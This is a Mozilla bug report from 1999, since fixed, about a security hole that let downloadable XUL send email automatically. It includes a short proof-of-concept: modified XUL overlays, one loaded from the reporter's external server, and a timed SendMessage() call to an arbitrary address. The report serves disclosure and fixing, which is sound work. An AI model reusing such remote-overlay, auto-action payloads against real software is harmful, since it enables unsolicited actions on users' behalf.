Closed Bug 12934 Opened 25 years ago Closed 25 years ago

Downloadable XUL allows automatically sending email

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

()

Details

There is a security vulnerability in build 1999082116 (guess others) which allows automatically sending email using downloadable XUL. [I could not make Messenger send a message even from Messenger in this build, but the demonstration opens a TCP connection to port 25 of the SMTP server and this is enough for me.] Demonstration is available at: http://www.nat.bg/~joro/mozilla/msg/send.html The code is: In addressingWidgetOverlay.xul the following is modified: <html:input id="msgRecipient#1" value="nobodyx@nosuchdomain.com" ... In messengercompose.xul the following modified: <?xul-overlay href="http://www.nat.bg/~joro/mozilla/msg/addressingWidgetOverlay.xul"?> ..... <html:input id="msgSubject" value="Test for automatically sending messages" type="text" flex="80%" onkeyup="SetComposeWindowTitle(event.which);"/> ..... setTimeout("alert('Trying to send message');SendMessage();",20000);
Status: NEW → ASSIGNED
Summary: Downloadable XUL allows automatically sending of email → Downloadable XUL allows automatically sending email
Another use of XPAppCoresManager.
Target Milestone: M11
Blocks: 12633
Depends on: 13021
Move security bugs from M11 to M13; needed for beta but not for dogfood.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
XPAppCoresManager finally died, closing this security hole.
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.